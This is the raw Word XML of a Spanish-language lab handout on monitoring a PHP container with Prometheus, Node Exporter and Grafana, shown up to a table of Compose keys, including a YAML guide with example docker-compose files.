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27DAF618" w:rsidR="003666DD" w:rsidRDefault="008D6FC3" w:rsidP="00025CA6">
      <w:pPr>
        <w:pStyle w:val="Ttulo"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Monitorización</w:t>
      </w:r>
      <w:r w:rsidR="00204AE9">
        <w:t xml:space="preserve"> con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Prometheus y Grafana</w:t>
      </w:r>
      <w:r w:rsidR="00204AE9">
        <w:t xml:space="preserve"> y simulación de carga con Python.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2B526C0E" w14:textId="099C542F" w:rsidR="008C5CC6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61916" w:history="1">
            <w:r w:rsidR="008C5CC6" w:rsidRPr="00731CA7">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recursos útiles</w:t>
            </w:r>
            <w:r w:rsidR="008C5CC6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="008C5CC6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="008C5CC6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc203361916 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="008C5CC6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="008C5CC6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="008C5CC6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="008C5CC6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14081261" w14:textId="04042D37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17" w:history="1">
            <w:r w:rsidRPr="00731CA7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DD0C" w14:textId="5B1A7208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18" w:history="1">
            <w:r w:rsidRPr="00731CA7">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Guía práctica YAML para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C59E" w14:textId="21CB259F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19" w:history="1">
            <w:r w:rsidRPr="00731CA7">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Estructura básica de un archivo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F0F9" w14:textId="020DA423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0" w:history="1">
            <w:r w:rsidRPr="00731CA7">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Comandos má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7199" w14:textId="24EA3C01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1" w:history="1">
            <w:r w:rsidRPr="00731CA7">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Nuestros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DF36" w14:textId="0742A3C3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2" w:history="1">
            <w:r w:rsidRPr="00731CA7">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>prometheu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F25B" w14:textId="344134E5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3" w:history="1">
            <w:r w:rsidRPr="00731CA7">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="en-US"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81CD" w14:textId="6E17E664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4" w:history="1">
            <w:r w:rsidRPr="00731CA7">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Levantamos nuestros D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48CD" w14:textId="4A8D5D6E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5" w:history="1">
            <w:r w:rsidRPr="00731CA7">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Servicio 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A434" w14:textId="195A8D2C" w:rsidR="008C5CC6" w:rsidRDefault="008C5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6" w:history="1">
            <w:r w:rsidRPr="00731CA7">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Servicios Prometheus y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66E2" w14:textId="466E3245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7" w:history="1">
            <w:r w:rsidRPr="00731CA7">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Crear Dashboard en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E005" w14:textId="566B07A3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8" w:history="1">
            <w:r w:rsidRPr="00731CA7">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Importando Dashboards realizados por otr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D337" w14:textId="191A8075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29" w:history="1">
            <w:r w:rsidRPr="00731CA7">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Simulando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D60D" w14:textId="38F375B5" w:rsidR="008C5CC6" w:rsidRDefault="008C5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30" w:history="1">
            <w:r w:rsidRPr="00731CA7">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Código Python de llamada a servicio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67DF" w14:textId="286BBC47" w:rsidR="008C5CC6" w:rsidRDefault="008C5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31" w:history="1">
            <w:r w:rsidRPr="00731CA7">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Instalación Visual Studio Code y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A3DD" w14:textId="78C3A759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32" w:history="1">
            <w:r w:rsidRPr="00731CA7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2490" w14:textId="3A3FEC6E" w:rsidR="008C5CC6" w:rsidRDefault="008C5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361933" w:history="1">
            <w:r w:rsidRPr="00731CA7">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Continu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67426288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361916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0A9916FE" w14:textId="3B1CAFFB" w:rsidR="0035497C" w:rsidRDefault="00BB3E45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t xml:space="preserve">Para esta práctica </w:t>
      </w:r>
      <w:r w:rsidR="00521554">
        <w:t xml:space="preserve"> disponemos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r w:rsidR="008D6FC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>monitoring</w:t>
      </w:r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  <w:r w:rsidR="0035497C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361917"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Objetivo de la práctica</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="55B0C282" w14:textId="46926E15" w:rsidR="008F2A99" w:rsidRDefault="008F2A99" w:rsidP="008F2A99">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esta </w:t>
      </w:r>
      <w:r w:rsidRPr="008F2A99">
        <w:t>práctica tiene como objetivo introducir al estudiante en los conceptos fundamentales de</w:t>
      </w:r>
      <w:r w:rsidR="00993D8B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00993D8B">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">monitorización a la vez que se profundiza en las claves para construir </w:t>
      </w:r>
      <w:r w:rsidR="00993D8B">
        <w:rPr>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">stacks </w:t>
      </w:r>
      <w:r w:rsidR="00993D8B">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>en Docker mediante lenguaje YAML en fichero Docker compose</w:t>
      </w:r>
      <w:r w:rsidR="00DF5DC4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E4307F" w14:textId="1F285371" w:rsidR="003473D1" w:rsidRDefault="003473D1" w:rsidP="008F2A99">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pPr>
      <w:r>
        <w:t>En concreto, vamos a m</w:t>
      </w:r>
      <w:r w:rsidRPr="003473D1">
        <w:t>onitorizar la actividad del sistema y del contenedor PHP usando Prometheus, Node Exporter y Grafana.</w:t>
      </w:r>
      <w:r w:rsidR="008805E7">
        <w:t xml:space="preserve"> Se recomienda ver el siguiente video:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08815C70" w14:textId="0E6ECF97" w:rsidR="008805E7" w:rsidRDefault="00D13B2A" w:rsidP="008F2A99">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00A535F1">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=riFxqD_6XYI</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2E13BC95" w14:textId="0B542CCD" w:rsidR="00C630EC" w:rsidRDefault="000C242B" w:rsidP="001D7A10">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc203361918"/>
      <w:r>
        <w:t>Gu</w:t>
      </w:r>
      <w:r w:rsidR="00F54376">
        <w:t>ía práctica YAML para Docker Compose</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="5D78D031" w14:textId="77777777" w:rsidR="00C12B69" w:rsidRPr="0052156F" w:rsidRDefault="00C065FA" w:rsidP="000A5C09">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="120"/>
        <w:ind w:hanging="357"/>
      </w:pPr>
      <w:r w:rsidRPr="00C065FA">
        <w:t>YAML (YAML Ain’t Markup Language) es un lenguaje de serialización de datos legible por humanos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D01904F" w14:textId="7A9FBF3F" w:rsidR="00C065FA" w:rsidRDefault="00C065FA" w:rsidP="000A5C09">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="120"/>
        <w:ind w:hanging="357"/>
      </w:pPr>
      <w:r w:rsidRPr="00C065FA">
        <w:t>Se usa en Docker Compose para definir servicios, redes, volúmenes, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B51C173" w14:textId="77777777" w:rsidR="002A51D4" w:rsidRDefault="002A51D4" w:rsidP="000A5C09">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="120"/>
        <w:ind w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:t>Indentación con espacios, no con tabs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3728E83D" w14:textId="77777777" w:rsidR="002A51D4" w:rsidRDefault="002A51D4" w:rsidP="000A5C09">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="120"/>
        <w:ind w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:t>Siempre usa 2 espacios por nivel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6F27D2" w14:textId="77777777" w:rsidR="002A51D4" w:rsidRDefault="002A51D4" w:rsidP="000A5C09">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="120"/>
        <w:ind w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:t>No pongas comillas si no es necesario, excepto en puertos tipo "3000:3000".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454F6F32" w14:textId="0447CEEF" w:rsidR="002A2FA7" w:rsidRDefault="002A51D4" w:rsidP="002A2FA7">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="120"/>
        <w:ind w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:t>Usa listas para arrays</w:t>
      </w:r>
      <w:r w:rsidR="002A2FA7">
        <w:t>; por ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2314736B" w14:textId="77777777" w:rsidR="002A2FA7" w:rsidRPr="002A2FA7" w:rsidRDefault="002A2FA7" w:rsidP="002A2FA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2A2FA7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629C848B" w14:textId="77777777" w:rsidR="002A2FA7" w:rsidRPr="002A2FA7" w:rsidRDefault="002A2FA7" w:rsidP="002A2FA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2A2FA7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  - "80:80"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4011F5CB" w14:textId="2995BCF0" w:rsidR="002A2FA7" w:rsidRPr="002A2FA7" w:rsidRDefault="002A2FA7" w:rsidP="002A2FA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2A2FA7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  - "443:443"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F7AADB" w14:textId="77777777" w:rsidR="000A5C09" w:rsidRDefault="00773D72" w:rsidP="000A5C09">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="120"/>
        <w:ind w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:t>Validador</w:t>
      </w:r>
      <w:r w:rsidR="000A5C09">
        <w:t>es</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AA83F2" w14:textId="7E0AAECA" w:rsidR="00773D72" w:rsidRDefault="000A5C09" w:rsidP="000A5C09">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="120"/>
        <w:ind w:hanging="357"/>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00A535F1">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://codebeautify.org/yaml-validator</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="71DF781D" w14:textId="622A7030" w:rsidR="000A5C09" w:rsidRDefault="000A5C09" w:rsidP="000A5C09">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="120"/>
        <w:ind w:hanging="357"/>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00A535F1">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://www.yamllint.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4933B283" w14:textId="77777777" w:rsidR="00773D72" w:rsidRDefault="00773D72" w:rsidP="00773D72">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="743BE7A9" w14:textId="61B4B5AB" w:rsidR="00C065FA" w:rsidRDefault="0052156F" w:rsidP="0052156F">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc203361919"/>
      <w:r>
        <w:t>Estructura básica de un archivo docker-compose.yml</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="18BC2196" w14:textId="274CCE8D" w:rsidR="002A51D4" w:rsidRPr="002A51D4" w:rsidRDefault="002A51D4" w:rsidP="002A51D4">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:t>Ejemplo 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095B62DB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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0052194E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>version: '3.8'  # Versión del esquema de Compose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F3FF04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>services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338AF660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app:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751A8402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image: node:18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15473757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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6822CCC2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  - "3000:3000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A162B9C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volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F93C02F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  - .:/app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4240B3F9" w14:textId="77777777" w:rsidR="0052194E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working_dir: /app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E0732" w14:textId="47453CAF" w:rsidR="0052156F" w:rsidRPr="0052194E" w:rsidRDefault="0052194E" w:rsidP="0052194E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0052194E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    command: ["npm", "start"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D06AFFC" w14:textId="68EA2C83" w:rsidR="00C065FA" w:rsidRDefault="00C065FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BCBEA92" w14:textId="7F2421E5" w:rsidR="002A51D4" w:rsidRPr="00117D9D" w:rsidRDefault="002A51D4" w:rsidP="002A51D4">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r w:rsidRPr="00117D9D">
        <w:lastRenderedPageBreak/>
        <w:t>Ejemplo 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FD90B3" w14:textId="77777777" w:rsidR="00900B3C" w:rsidRPr="00117D9D" w:rsidRDefault="00900B3C" w:rsidP="00900B3C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>version: '3.8'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BCEDE8" w14:textId="77777777" w:rsidR="00900B3C" w:rsidRPr="00117D9D" w:rsidRDefault="00900B3C" w:rsidP="00900B3C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>services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FF9807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117D9D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00900B3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2078079B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build: .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C88E97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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2413030F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- "8080:80"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086925E0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volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DECA88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- ./web:/usr/share/nginx/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320C9A2D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depends_on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288370DD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- db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558D90D2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2F9AD85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db:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F828A01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image: mysql:8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF5152A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restart: always</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E39CD10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environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7CD2BB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MYSQL_ROOT_PASSWORD: rootpass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AD0368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MYSQL_DATABASE: exampledb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1568A4D2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volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A87BF76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  <w:r w:rsidRPr="00900B3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      - db_data:/var/lib/mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C91464" w14:textId="77777777" w:rsidR="00900B3C" w:rsidRPr="00900B3C" w:rsidRDefault="00900B3C" w:rsidP="00900B3C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1202A33" w14:textId="77777777" w:rsidR="00900B3C" w:rsidRPr="00773D72" w:rsidRDefault="00900B3C" w:rsidP="00900B3C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00773D72">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE077C8" w14:textId="29FFD9B2" w:rsidR="002A51D4" w:rsidRPr="00773D72" w:rsidRDefault="00900B3C" w:rsidP="00900B3C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00773D72">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  db_data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688B1776" w14:textId="77777777" w:rsidR="002A51D4" w:rsidRPr="00773D72" w:rsidRDefault="002A51D4" w:rsidP="002A51D4"/>
    <w:p w14:paraId="70902F85" w14:textId="5A41C362" w:rsidR="002A51D4" w:rsidRPr="00773D72" w:rsidRDefault="00773D72" w:rsidP="00773D72">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc203361920"/>
      <w:r w:rsidRPr="00773D72">
        <w:t>Comandos más comune</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula4-nfasis1"/>
        <w:tblW w:w="0" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4214"/>
        <w:gridCol w:w="4280"/>
      </w:tblGrid>
      <w:tr w:rsidR="006334CE" w:rsidRPr="006334CE" w14:paraId="53F01D8E" w14:textId="77777777" w:rsidTr="0063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0B4D3F8A" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="006334CE">
            <w:pPr>
              <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006334CE">
              <w:t>Clave </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4575" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D8B4C05" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="006334C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Descripción </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006334CE" w:rsidRPr="006334CE" w14:paraId="164A11E8" w14:textId="77777777" w:rsidTr="0063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3DAABD4F" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="00900B3C">
            <w:pPr>
              <w:pStyle w:val="Texto"/>
            </w:pPr>
            <w:r w:rsidRPr="006334CE">
              <w:t>services </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4575" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A2D48AE" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="00900B3C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CE">
              <w:t>Define los contenedores que se van a usar </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006334CE" w:rsidRPr="006334CE" w14:paraId="1143A457" w14:textId="77777777" w:rsidTr="0063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329DAAD4" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="00900B3C">
            <w:pPr>
              <w:pStyle w:val="Texto"/>
            </w:pPr>
            <w:r w:rsidRPr="006334CE">
              <w:t>image </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4575" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65AF4DAC" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="00900B3C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Imagen de Docker que se va a usar </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006334CE" w:rsidRPr="006334CE" w14:paraId="24832008" w14:textId="77777777" w:rsidTr="0063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6B0463D0" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="00900B3C">
            <w:pPr>
              <w:pStyle w:val="Texto"/>
            </w:pPr>
            <w:r w:rsidRPr="006334CE">
              <w:t>build </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4575" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="227603F9" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="00900B3C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CE">
              <w:t>Directorio o Dockerfile para construir la imagen </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006334CE" w:rsidRPr="006334CE" w14:paraId="4109C80E" w14:textId="77777777" w:rsidTr="0063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55708BB3" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="00900B3C">
            <w:pPr>
              <w:pStyle w:val="Texto"/>
            </w:pPr>
            <w:r w:rsidRPr="006334CE">
              <w:t>ports </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4575" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59AC4617" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="00900B3C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Mapeo de puertos (`host:contenedor`) </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006334CE" w:rsidRPr="006334CE" w14:paraId="6630E416" w14:textId="77777777" w:rsidTr="0063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2F4CA9E9" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="00900B3C">
            <w:pPr>
              <w:pStyle w:val="Texto"/>
            </w:pPr>
            <w:r w:rsidRPr="006334CE">
              <w:t>volumes </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4575" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B1F2DE8" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="00900B3C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CE">
              <w:t>Mapeo de volúmenes (`host:contenedor`) </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006334CE" w:rsidRPr="006334CE" w14:paraId="7307B3C6" w14:textId="77777777" w:rsidTr="0063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7CAB12C7" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="00900B3C">
            <w:pPr>
              <w:pStyle w:val="Texto"/>
            </w:pPr>
            <w:r w:rsidRPr="006334CE">
              <w:t>networks </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
